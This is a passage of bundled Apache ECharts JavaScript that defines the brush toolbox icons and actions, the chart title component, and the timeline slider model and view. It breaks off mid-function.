M11.6,18.4l1,6.1 M32.8,41.9 M26.6,40.4 M27.3,40.2l6.1,1.6 M49.9,52.1l-5.6-7.6l-4.9-1.2', // jshint ignore:line\n        lineX: 'M15.2,30 M19.7,15.6V1.9H29 M34.8,1.9H40.4 M55.3,15.6V1.9H45.9 M19.7,44.4V58.1H29 M34.8,58.1H40.4 M55.3,44.4 V58.1H45.9 M12.5,20.3l-9.4,9.6l9.6,9.8 M3.1,29.9h16.5 M62.5,20.3l9.4,9.6L62.3,39.7 M71.9,29.9H55.4', // jshint ignore:line\n        lineY: 'M38.8,7.7 M52.7,12h13.2v9 M65.9,26.6V32 M52.7,46.3h13.2v-9 M24.9,12H11.8v9 M11.8,26.6V32 M24.9,46.3H11.8v-9 M48.2,5.1l-9.3-9l-9.4,9.2 M38.9-3.9V12 M48.2,53.3l-9.3,9l-9.4-9.2 M38.9,62.3V46.4', // jshint ignore:line\n        keep: 'M4,10.5V1h10.3 M20.7,1h6.1 M33,1h6.1 M55.4,10.5V1H45.2 M4,17.3v6.6 M55.6,17.3v6.6 M4,30.5V40h10.3 M20.7,40 h6.1 M33,40h6.1 M55.4,30.5V40H45.2 M21,18.9h62.9v48.6H21V18.9z', // jshint ignore:line\n        clear: 'M22,14.7l30.9,31 M52.9,14.7L22,45.7 M4.7,16.8V4.2h13.1 M26,4.2h7.8 M41.6,4.2h7.8 M70.3,16.8V4.2H57.2 M4.7,25.9v8.6 M70.3,25.9v8.6 M4.7,43.2v12.6h13.1 M26,55.8h7.8 M41.6,55.8h7.8 M70.3,43.2v12.6H57.2' // jshint ignore:line\n        /* eslint-enable */\n    },\n    // `rect`, `polygon`, `lineX`, `lineY`, `keep`, `clear`\n    title: clone(brushLang.title)\n};\n\nvar proto$7 = Brush.prototype;\n\n// proto.updateLayout = function (featureModel, ecModel, api) {\n/* eslint-disable */\nproto$7.render =\n/* eslint-enable */\nproto$7.updateView = function (featureModel, ecModel, api) {\n    var brushType;\n    var brushMode;\n    var isBrushed;\n\n    ecModel.eachComponent({mainType: 'brush'}, function (brushModel) {\n        brushType = brushModel.brushType;\n        brushMode = brushModel.brushOption.brushMode || 'single';\n        isBrushed |= brushModel.areas.length;\n    });\n    this._brushType = brushType;\n    this._brushMode = brushMode;\n\n    each$1(featureModel.get('type', true), function (type) {\n        featureModel.setIconStatus(\n            type,\n            (\n                type === 'keep'\n                ? brushMode === 'multiple'\n                : type === 'clear'\n                ? isBrushed\n                : type === brushType\n            ) ? 'emphasis' : 'normal'\n        );\n    });\n};\n\nproto$7.getIcons = function () {\n    var model = this.model;\n    var availableIcons = model.get('icon', true);\n    var icons = {};\n    each$1(model.get('type', true), function (type) {\n        if (availableIcons[type]) {\n            icons[type] = availableIcons[type];\n        }\n    });\n    return icons;\n};\n\nproto$7.onclick = function (ecModel, api, type) {\n    var brushType = this._brushType;\n    var brushMode = this._brushMode;\n\n    if (type === 'clear') {\n        // Trigger parallel action firstly\n        api.dispatchAction({\n            type: 'axisAreaSelect',\n            intervals: []\n        });\n\n        api.dispatchAction({\n            type: 'brush',\n            command: 'clear',\n            // Clear all areas of all brush components.\n            areas: []\n        });\n    }\n    else {\n        api.dispatchAction({\n            type: 'takeGlobalCursor',\n            key: 'brush',\n            brushOption: {\n                brushType: type === 'keep'\n                    ? brushType\n                    : (brushType === type ? false : type),\n                brushMode: type === 'keep'\n                    ? (brushMode === 'multiple' ? 'single' : 'multiple')\n                    : brushMode\n            }\n        });\n    }\n};\n\nregister$1('brush', Brush);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Brush component entry\n */\n\nregisterPreprocessor(preprocessor$1);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Model\nextendComponentModel({\n\n    type: 'title',\n\n    layoutMode: {type: 'box', ignoreSize: true},\n\n    defaultOption: {\n        // 一级层叠\n        zlevel: 0,\n        // 二级层叠\n        z: 6,\n        show: true,\n\n        text: '',\n        // 超链接跳转\n        // link: null,\n        // 仅支持self | blank\n        target: 'blank',\n        subtext: '',\n\n        // 超链接跳转\n        // sublink: null,\n        // 仅支持self | blank\n        subtarget: 'blank',\n\n        // 'center' ¦ 'left' ¦ 'right'\n        // ¦ {number}（x坐标，单位px）\n        left: 0,\n        // 'top' ¦ 'bottom' ¦ 'center'\n        // ¦ {number}（y坐标，单位px）\n        top: 0,\n\n        // 水平对齐\n        // 'auto' | 'left' | 'right' | 'center'\n        // 默认根据 left 的位置判断是左对齐还是右对齐\n        // textAlign: null\n        //\n        // 垂直对齐\n        // 'auto' | 'top' | 'bottom' | 'middle'\n        // 默认根据 top 位置判断是上对齐还是下对齐\n        // textVerticalAlign: null\n        // textBaseline: null // The same as textVerticalAlign.\n\n        backgroundColor: 'rgba(0,0,0,0)',\n\n        // 标题边框颜色\n        borderColor: '#ccc',\n\n        // 标题边框线宽，单位px，默认为0（无边框）\n        borderWidth: 0,\n\n        // 标题内边距，单位px，默认各方向内边距为5，\n        // 接受数组分别设定上右下左边距，同css\n        padding: 5,\n\n        // 主副标题纵向间隔，单位px，默认为10，\n        itemGap: 10,\n        textStyle: {\n            fontSize: 18,\n            fontWeight: 'bolder',\n            color: '#333'\n        },\n        subtextStyle: {\n            color: '#aaa'\n        }\n    }\n});\n\n// View\nextendComponentView({\n\n    type: 'title',\n\n    render: function (titleModel, ecModel, api) {\n        this.group.removeAll();\n\n        if (!titleModel.get('show')) {\n            return;\n        }\n\n        var group = this.group;\n\n        var textStyleModel = titleModel.getModel('textStyle');\n        var subtextStyleModel = titleModel.getModel('subtextStyle');\n\n        var textAlign = titleModel.get('textAlign');\n        var textVerticalAlign = retrieve2(\n            titleModel.get('textBaseline'), titleModel.get('textVerticalAlign')\n        );\n\n        var textEl = new Text({\n            style: setTextStyle({}, textStyleModel, {\n                text: titleModel.get('text'),\n                textFill: textStyleModel.getTextColor()\n            }, {disableBox: true}),\n            z2: 10\n        });\n\n        var textRect = textEl.getBoundingRect();\n\n        var subText = titleModel.get('subtext');\n        var subTextEl = new Text({\n            style: setTextStyle({}, subtextStyleModel, {\n                text: subText,\n                textFill: subtextStyleModel.getTextColor(),\n                y: textRect.height + titleModel.get('itemGap'),\n                textVerticalAlign: 'top'\n            }, {disableBox: true}),\n            z2: 10\n        });\n\n        var link = titleModel.get('link');\n        var sublink = titleModel.get('sublink');\n        var triggerEvent = titleModel.get('triggerEvent', true);\n\n        textEl.silent = !link && !triggerEvent;\n        subTextEl.silent = !sublink && !triggerEvent;\n\n        if (link) {\n            textEl.on('click', function () {\n                window.open(link, '_' + titleModel.get('target'));\n            });\n        }\n        if (sublink) {\n            subTextEl.on('click', function () {\n                window.open(sublink, '_' + titleModel.get('subtarget'));\n            });\n        }\n\n        textEl.eventData = subTextEl.eventData = triggerEvent\n            ? {\n                componentType: 'title',\n                componentIndex: titleModel.componentIndex\n            }\n            : null;\n\n        group.add(textEl);\n        subText && group.add(subTextEl);\n        // If no subText, but add subTextEl, there will be an empty line.\n\n        var groupRect = group.getBoundingRect();\n        var layoutOption = titleModel.getBoxLayoutParams();\n        layoutOption.width = groupRect.width;\n        layoutOption.height = groupRect.height;\n        var layoutRect = getLayoutRect(\n            layoutOption, {\n                width: api.getWidth(),\n                height: api.getHeight()\n            }, titleModel.get('padding')\n        );\n        // Adjust text align based on position\n        if (!textAlign) {\n            // Align left if title is on the left. center and right is same\n            textAlign = titleModel.get('left') || titleModel.get('right');\n            if (textAlign === 'middle') {\n                textAlign = 'center';\n            }\n            // Adjust layout by text align\n            if (textAlign === 'right') {\n                layoutRect.x += layoutRect.width;\n            }\n            else if (textAlign === 'center') {\n                layoutRect.x += layoutRect.width / 2;\n            }\n        }\n        if (!textVerticalAlign) {\n            textVerticalAlign = titleModel.get('top') || titleModel.get('bottom');\n            if (textVerticalAlign === 'center') {\n                textVerticalAlign = 'middle';\n            }\n            if (textVerticalAlign === 'bottom') {\n                layoutRect.y += layoutRect.height;\n            }\n            else if (textVerticalAlign === 'middle') {\n                layoutRect.y += layoutRect.height / 2;\n            }\n\n            textVerticalAlign = textVerticalAlign || 'top';\n        }\n\n        group.attr('position', [layoutRect.x, layoutRect.y]);\n        var alignStyle = {\n            textAlign: textAlign,\n            textVerticalAlign: textVerticalAlign\n        };\n        textEl.setStyle(alignStyle);\n        subTextEl.setStyle(alignStyle);\n\n        // Render background\n        // Get groupRect again because textAlign has been changed\n        groupRect = group.getBoundingRect();\n        var padding = layoutRect.margin;\n        var style = titleModel.getItemStyle(['color', 'opacity']);\n        style.fill = titleModel.get('backgroundColor');\n        var rect = new Rect({\n            shape: {\n                x: groupRect.x - padding[3],\n                y: groupRect.y - padding[0],\n                width: groupRect.width + padding[1] + padding[3],\n                height: groupRect.height + padding[0] + padding[2],\n                r: titleModel.get('borderRadius')\n            },\n            style: style,\n            subPixelOptimize: true,\n            silent: true\n        });\n\n        group.add(rect);\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar preprocessor$2 = function (option) {\n    var timelineOpt = option && option.timeline;\n\n    if (!isArray(timelineOpt)) {\n        timelineOpt = timelineOpt ? [timelineOpt] : [];\n    }\n\n    each$1(timelineOpt, function (opt) {\n        if (!opt) {\n            return;\n        }\n\n        compatibleEC2(opt);\n    });\n};\n\nfunction compatibleEC2(opt) {\n    var type = opt.type;\n\n    var ec2Types = {'number': 'value', 'time': 'time'};\n\n    // Compatible with ec2\n    if (ec2Types[type]) {\n        opt.axisType = ec2Types[type];\n        delete opt.type;\n    }\n\n    transferItem(opt);\n\n    if (has$1(opt, 'controlPosition')) {\n        var controlStyle = opt.controlStyle || (opt.controlStyle = {});\n        if (!has$1(controlStyle, 'position')) {\n            controlStyle.position = opt.controlPosition;\n        }\n        if (controlStyle.position === 'none' && !has$1(controlStyle, 'show')) {\n            controlStyle.show = false;\n            delete controlStyle.position;\n        }\n        delete opt.controlPosition;\n    }\n\n    each$1(opt.data || [], function (dataItem) {\n        if (isObject$1(dataItem) && !isArray(dataItem)) {\n            if (!has$1(dataItem, 'value') && has$1(dataItem, 'name')) {\n                // In ec2, using name as value.\n                dataItem.value = dataItem.name;\n            }\n            transferItem(dataItem);\n        }\n    });\n}\n\nfunction transferItem(opt) {\n    var itemStyle = opt.itemStyle || (opt.itemStyle = {});\n\n    var itemStyleEmphasis = itemStyle.emphasis || (itemStyle.emphasis = {});\n\n    // Transfer label out\n    var label = opt.label || (opt.label || {});\n    var labelNormal = label.normal || (label.normal = {});\n    var excludeLabelAttr = {normal: 1, emphasis: 1};\n\n    each$1(label, function (value, name) {\n        if (!excludeLabelAttr[name] && !has$1(labelNormal, name)) {\n            labelNormal[name] = value;\n        }\n    });\n\n    if (itemStyleEmphasis.label && !has$1(label, 'emphasis')) {\n        label.emphasis = itemStyleEmphasis.label;\n        delete itemStyleEmphasis.label;\n    }\n}\n\nfunction has$1(obj, attr) {\n    return obj.hasOwnProperty(attr);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nComponentModel.registerSubTypeDefaulter('timeline', function () {\n    // Only slider now.\n    return 'slider';\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterAction(\n\n    {type: 'timelineChange', event: 'timelineChanged', update: 'prepareAndUpdate'},\n\n    function (payload, ecModel) {\n\n        var timelineModel = ecModel.getComponent('timeline');\n        if (timelineModel && payload.currentIndex != null) {\n            timelineModel.setCurrentIndex(payload.currentIndex);\n\n            if (!timelineModel.get('loop', true) && timelineModel.isIndexMax()) {\n                timelineModel.setPlayState(false);\n            }\n        }\n\n        // Set normalized currentIndex to payload.\n        ecModel.resetOption('timeline');\n\n        return defaults({\n            currentIndex: timelineModel.option.currentIndex\n        }, payload);\n    }\n);\n\nregisterAction(\n\n    {type: 'timelinePlayChange', event: 'timelinePlayChanged', update: 'update'},\n\n    function (payload, ecModel) {\n        var timelineModel = ecModel.getComponent('timeline');\n        if (timelineModel && payload.playState != null) {\n            timelineModel.setPlayState(payload.playState);\n        }\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar TimelineModel = ComponentModel.extend({\n\n    type: 'timeline',\n\n    layoutMode: 'box',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n\n        zlevel: 0,                  // 一级层叠\n        z: 4,                       // 二级层叠\n        show: true,\n\n        axisType: 'time',  // 模式是时间类型，支持 value, category\n\n        realtime: true,\n\n        left: '20%',\n        top: null,\n        right: '20%',\n        bottom: 0,\n        width: null,\n        height: 40,\n        padding: 5,\n\n        controlPosition: 'left',           // 'left' 'right' 'top' 'bottom' 'none'\n        autoPlay: false,\n        rewind: false,                     // 反向播放\n        loop: true,\n        playInterval: 2000,                // 播放时间间隔，单位ms\n\n        currentIndex: 0,\n\n        itemStyle: {},\n        label: {\n            color: '#000'\n        },\n\n        data: []\n    },\n\n    /**\n     * @override\n     */\n    init: function (option, parentModel, ecModel) {\n\n        /**\n         * @private\n         * @type {module:echarts/data/List}\n         */\n        this._data;\n\n        /**\n         * @private\n         * @type {Array.<string>}\n         */\n        this._names;\n\n        this.mergeDefaultAndTheme(option, ecModel);\n        this._initData();\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function (option) {\n        TimelineModel.superApply(this, 'mergeOption', arguments);\n        this._initData();\n    },\n\n    /**\n     * @param {number} [currentIndex]\n     */\n    setCurrentIndex: function (currentIndex) {\n        if (currentIndex == null) {\n            currentIndex = this.option.currentIndex;\n        }\n        var count = this._data.count();\n\n        if (this.option.loop) {\n            currentIndex = (currentIndex % count + count) % count;\n        }\n        else {\n            currentIndex >= count && (currentIndex = count - 1);\n            currentIndex < 0 && (currentIndex = 0);\n        }\n\n        this.option.currentIndex = currentIndex;\n    },\n\n    /**\n     * @return {number} currentIndex\n     */\n    getCurrentIndex: function () {\n        return this.option.currentIndex;\n    },\n\n    /**\n     * @return {boolean}\n     */\n    isIndexMax: function () {\n        return this.getCurrentIndex() >= this._data.count() - 1;\n    },\n\n    /**\n     * @param {boolean} state true: play, false: stop\n     */\n    setPlayState: function (state) {\n        this.option.autoPlay = !!state;\n    },\n\n    /**\n     * @return {boolean} true: play, false: stop\n     */\n    getPlayState: function () {\n        return !!this.option.autoPlay;\n    },\n\n    /**\n     * @private\n     */\n    _initData: function () {\n        var thisOption = this.option;\n        var dataArr = thisOption.data || [];\n        var axisType = thisOption.axisType;\n        var names = this._names = [];\n\n        if (axisType === 'category') {\n            var idxArr = [];\n            each$1(dataArr, function (item, index) {\n                var value = getDataItemValue(item);\n                var newItem;\n\n                if (isObject$1(item)) {\n                    newItem = clone(item);\n                    newItem.value = index;\n                }\n                else {\n                    newItem = index;\n                }\n\n                idxArr.push(newItem);\n\n                if (!isString(value) && (value == null || isNaN(value))) {\n                    value = '';\n                }\n\n                names.push(value + '');\n            });\n            dataArr = idxArr;\n        }\n\n        var dimType = ({category: 'ordinal', time: 'time'})[axisType] || 'number';\n\n        var data = this._data = new List([{name: 'value', type: dimType}], this);\n\n        data.initData(dataArr, names);\n    },\n\n    getData: function () {\n        return this._data;\n    },\n\n    /**\n     * @public\n     * @return {Array.<string>} categoreis\n     */\n    getCategories: function () {\n        if (this.get('axisType') === 'category') {\n            return this._names.slice();\n        }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar SliderTimelineModel = TimelineModel.extend({\n\n    type: 'timeline.slider',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n\n        backgroundColor: 'rgba(0,0,0,0)',   // 时间轴背景颜色\n        borderColor: '#ccc',               // 时间轴边框颜色\n        borderWidth: 0,                    // 时间轴边框线宽，单位px，默认为0（无边框）\n\n        orient: 'horizontal',              // 'vertical'\n        inverse: false,\n\n        tooltip: {                          // boolean or Object\n            trigger: 'item'                 // data item may also have tootip attr.\n        },\n\n        symbol: 'emptyCircle',\n        symbolSize: 10,\n\n        lineStyle: {\n            show: true,\n            width: 2,\n            color: '#304654'\n        },\n        label: {                            // 文本标签\n            position: 'auto',           // auto left right top bottom\n                                        // When using number, label position is not\n                                        // restricted by viewRect.\n                                        // positive: right/bottom, negative: left/top\n            show: true,\n            interval: 'auto',\n            rotate: 0,\n            // formatter: null,\n            // 其余属性默认使用全局文本样式，详见TEXTSTYLE\n            color: '#304654'\n        },\n        itemStyle: {\n            color: '#304654',\n            borderWidth: 1\n        },\n\n        checkpointStyle: {\n            symbol: 'circle',\n            symbolSize: 13,\n            color: '#c23531',\n            borderWidth: 5,\n            borderColor: 'rgba(194,53,49, 0.5)',\n            animation: true,\n            animationDuration: 300,\n            animationEasing: 'quinticInOut'\n        },\n\n        controlStyle: {\n            show: true,\n            showPlayBtn: true,\n            showPrevBtn: true,\n            showNextBtn: true,\n            itemSize: 22,\n            itemGap: 12,\n            position: 'left',  // 'left' 'right' 'top' 'bottom'\n            playIcon: 'path://M31.6,53C17.5,53,6,41.5,6,27.4S17.5,1.8,31.6,1.8C45.7,1.8,57.2,13.3,57.2,27.4S45.7,53,31.6,53z M31.6,3.3 C18.4,3.3,7.5,14.1,7.5,27.4c0,13.3,10.8,24.1,24.1,24.1C44.9,51.5,55.7,40.7,55.7,27.4C55.7,14.1,44.9,3.3,31.6,3.3z M24.9,21.3 c0-2.2,1.6-3.1,3.5-2l10.5,6.1c1.899,1.1,1.899,2.9,0,4l-10.5,6.1c-1.9,1.1-3.5,0.2-3.5-2V21.3z', // jshint ignore:line\n            stopIcon: 'path://M30.9,53.2C16.8,53.2,5.3,41.7,5.3,27.6S16.8,2,30.9,2C45,2,56.4,13.5,56.4,27.6S45,53.2,30.9,53.2z M30.9,3.5C17.6,3.5,6.8,14.4,6.8,27.6c0,13.3,10.8,24.1,24.101,24.1C44.2,51.7,55,40.9,55,27.6C54.9,14.4,44.1,3.5,30.9,3.5z M36.9,35.8c0,0.601-0.4,1-0.9,1h-1.3c-0.5,0-0.9-0.399-0.9-1V19.5c0-0.6,0.4-1,0.9-1H36c0.5,0,0.9,0.4,0.9,1V35.8z M27.8,35.8 c0,0.601-0.4,1-0.9,1h-1.3c-0.5,0-0.9-0.399-0.9-1V19.5c0-0.6,0.4-1,0.9-1H27c0.5,0,0.9,0.4,0.9,1L27.8,35.8L27.8,35.8z', // jshint ignore:line\n            nextIcon: 'path://M18.6,50.8l22.5-22.5c0.2-0.2,0.3-0.4,0.3-0.7c0-0.3-0.1-0.5-0.3-0.7L18.7,4.4c-0.1-0.1-0.2-0.3-0.2-0.5 c0-0.4,0.3-0.8,0.8-0.8c0.2,0,0.5,0.1,0.6,0.3l23.5,23.5l0,0c0.2,0.2,0.3,0.4,0.3,0.7c0,0.3-0.1,0.5-0.3,0.7l-0.1,0.1L19.7,52 c-0.1,0.1-0.3,0.2-0.5,0.2c-0.4,0-0.8-0.3-0.8-0.8C18.4,51.2,18.5,51,18.6,50.8z', // jshint ignore:line\n            prevIcon: 'path://M43,52.8L20.4,30.3c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.3,0.1-0.5,0.3-0.7L42.9,6.4c0.1-0.1,0.2-0.3,0.2-0.5 c0-0.4-0.3-0.8-0.8-0.8c-0.2,0-0.5,0.1-0.6,0.3L18.3,28.8l0,0c-0.2,0.2-0.3,0.4-0.3,0.7c0,0.3,0.1,0.5,0.3,0.7l0.1,0.1L41.9,54 c0.1,0.1,0.3,0.2,0.5,0.2c0.4,0,0.8-0.3,0.8-0.8C43.2,53.2,43.1,53,43,52.8z', // jshint ignore:line\n\n            color: '#304654',\n            borderColor: '#304654',\n            borderWidth: 1\n        },\n\n        emphasis: {\n            label: {\n                show: true,\n                // 其余属性默认使用全局文本样式，详见TEXTSTYLE\n                color: '#c23531'\n            },\n\n            itemStyle: {\n                color: '#c23531'\n            },\n\n            controlStyle: {\n                color: '#c23531',\n                borderColor: '#c23531',\n                borderWidth: 2\n            }\n        },\n        data: []\n    }\n\n});\n\nmixin(SliderTimelineModel, dataFormatMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar TimelineView = Component$1.extend({\n    type: 'timeline'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Extend axis 2d\n * @constructor module:echarts/coord/cartesian/Axis2D\n * @extends {module:echarts/coord/cartesian/Axis}\n * @param {string} dim\n * @param {*} scale\n * @param {Array.<number>} coordExtent\n * @param {string} axisType\n * @param {string} position\n */\nvar TimelineAxis = function (dim, scale, coordExtent, axisType) {\n\n    Axis.call(this, dim, scale, coordExtent);\n\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = axisType || 'value';\n\n    /**\n     * Axis model\n     * @param {module:echarts/component/TimelineModel}\n     */\n    this.model = null;\n};\n\nTimelineAxis.prototype = {\n\n    constructor: TimelineAxis,\n\n    /**\n     * @override\n     */\n    getLabelModel: function () {\n        return this.model.getModel('label');\n    },\n\n    /**\n     * @override\n     */\n    isHorizontal: function () {\n        return this.model.get('orient') === 'horizontal';\n    }\n\n};\n\ninherits(TimelineAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar bind$4 = bind;\nvar each$24 = each$1;\n\nvar PI$5 = Math.PI;\n\nTimelineView.extend({\n\n    type: 'timeline.slider',\n\n    init: function (ecModel, api) {\n\n        this.api = api;\n\n        /**\n         * @private\n         * @type {module:echarts/component/timeline/TimelineAxis}\n         */\n        this._axis;\n\n        /**\n         * @private\n         * @type {module:zrender/core/BoundingRect}\n         */\n        this._viewRect;\n\n        /**\n         * @type {number}\n         */\n        this._timer;\n\n        /**\n         * @type {module:zrender/Element}\n         */\n        this._currentPointer;\n\n        /**\n         * @type {module:zrender/container/Group}\n         */\n        this._mainGroup;\n\n        /**\n         * @type {module:zrender/container/Group}\n         */\n        this._labelGroup;\n    },\n\n    /**\n     * @override\n     */\n    render: function (timelineModel, ecModel, api, payload) {\n        this.model = timelineModel;\n        this.api = api;\n        this.ecModel = ecModel;\n\n        this.group.removeAll();\n\n        if (timelineModel.get('show', true)) {\n\n            var layoutInfo = this._layout(timelineModel, api);\n            var mainGroup = this._createGroup('mainGroup');\n            var labelGroup = this._createGroup('labelGroup');\n\n            /**\n             * @private\n             * @type {module:echarts/component/timeline/TimelineAxis}\n             */\n            var axis = this._axis = this._createAxis(layoutInfo, timelineModel);\n\n            timelineModel.formatTooltip = function (dataIndex) {\n                return encodeHTML(axis.scale.getLabel(dataIndex));\n            };\n\n            each$24(\n                ['AxisLine', 'AxisTick', 'Control', 'CurrentPointer'],\n                function (name) {\n                    this['_render' + name](layoutInfo, mainGroup, axis, timelineModel);\n                },\n                this\n            );\n\n            this._renderAxisLabel(layoutInfo, labelGroup, axis, timelineModel);\n            this._position(layoutInfo, timelineModel);\n        }\n\n        this._doPlayStop();\n    },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        this._clearTimer();\n        this.group.removeAll();\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        this._clearTimer();\n    },\n\n    _layout: function (timelineModel, api) {\n        var labelPosOpt = timelineModel.get('label.position');\n        var orient = timelineModel.get('orient');\n        var viewRect = getViewRect$5(timelineModel, api);\n        // Auto label offset.\n        if (labelPosOpt == null || labelPosOpt === 'auto') {\n            labelPosOpt = orient === 'horizontal'\n                ? ((viewRect.y + viewRect.height / 2) < api.getHeight() / 2 ? '-' : '+')\n                : ((viewRect.x + viewRect.width / 2) < api.getWidth() / 2 ? '+' : '-');\n        }\n        else if (isNaN(labelPosOpt)) {\n            labelPosOpt = ({\n                horizontal: {top: '-', bottom: '+'},\n                vertical: {left: '-', right: '+'}\n            })[orient][labelPosOpt];\n        }\n\n        var labelAlignMap = {\n            horizontal: 'center',\n            vertical: (labelPosOpt >= 0 || labelPosOpt === '+') ? 'left' : 'right'\n        };\n\n        var labelBaselineMap = {\n            horizontal: (labelPosOpt >= 0 || labelPosOpt === '+') ? 'top' : 'bottom',\n            vertical: 'middle'\n        };\n        var rotationMap = {\n            horizontal: 0,\n            vertical: PI$5 / 2\n        };\n\n        // Position\n        var mainLength = orient === 'vertical' ? viewRect.height : viewRect.width;\n\n        var controlModel = timelineModel.getModel('controlStyle');\n        var showControl = controlModel.get('show', true);\n        var controlSize = showControl ? 